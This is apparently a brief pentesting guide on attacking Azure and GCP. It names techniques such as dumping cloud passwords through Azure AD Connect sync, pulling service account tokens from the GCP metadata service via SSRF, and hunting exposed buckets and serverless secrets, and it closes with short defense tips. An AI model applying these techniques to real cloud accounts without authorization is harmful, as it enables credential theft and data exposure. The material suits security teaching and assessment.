Pentesting AWS is well documented. But Azure and GCP are gaining ground. The principles are similar: It's rarely a buffer overflow; it's almost always a Misconfiguration or Over-permissioned Role.
Azure AD (Entra ID)
In Azure, identity is everything.
Attack: Azure AD Connect Password Hash Sync.
If on-prem AD is synced to Azure, compromising the on-prem Domain Admin allows you to dump ALL cloud passwords too.
Tools: MicroBurst, Az PowerShell.
1. GCP Metadata service
Similar to AWS, GCP has a metadata service at `http://metadata.google.internal/`.
Header required: `Metadata-Flavor: Google`.
If you find an SSRF on a GCP VM, you can query this to get the Service Account Token and access Cloud Storage buckets.
2. Storage Hunting
Azure Blobs: Scanned via tools like `MicroBurst`. Look for "passwords.txt" or ".env".
GCP Buckets: Authenticated users ( any google account) might have read access if permissions are "AllAuthenticatedUsers" (which includes ANYONE with a gmail account, not just your company!).
3. Cloud Functions / Run
Serverless functions often have hardcoded secrets in environment variables.
If you can gain read access to the function configuration, you own the database credentials.
Defense
1. Least Privilege: Use PIM (Privileged Identity Management) in Azure to give Just-In-Time access.
2. Service Boundaries: Use VPC Service Controls in GCP to prevent data exfiltration even if creds are stolen.